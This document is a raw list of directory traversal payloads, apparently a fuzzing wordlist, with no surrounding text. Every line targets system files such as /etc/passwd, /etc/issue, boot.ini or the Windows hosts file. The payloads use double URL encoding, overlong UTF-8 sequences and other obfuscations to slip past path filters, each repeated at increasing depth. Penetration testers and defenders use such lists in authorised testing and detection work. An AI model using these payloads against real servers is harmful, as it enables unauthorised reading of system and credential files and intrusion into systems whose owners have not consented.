-%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%af%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%af%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afpasswd -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afpasswd -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afpasswd -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afpasswd -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afetc%e0%80%afissue -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afboot.ini -%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%af%252e%252e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259c%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259c%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cpasswd -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cetc%25c1%259cissue -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cboot.ini -%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259c%252e%252e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25af%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25af%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afissue -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afboot.ini -%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25af%252e%252e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afpasswd -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afetc%f0%80%80%afissue -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afboot.ini -%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%af%252e%252e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afetc%f8%80%80%80%afissue -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afboot.ini -%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%af%252e%252e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/issue -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/system32/drivers/etc/hosts -%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e\%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\etc\issue -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\windows\system32\drivers\etc\hosts -%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fissue -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fboot.ini -%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cpasswd -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cetc%5cissue -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cboot.ini -%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5c%c0%2e%c0%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts 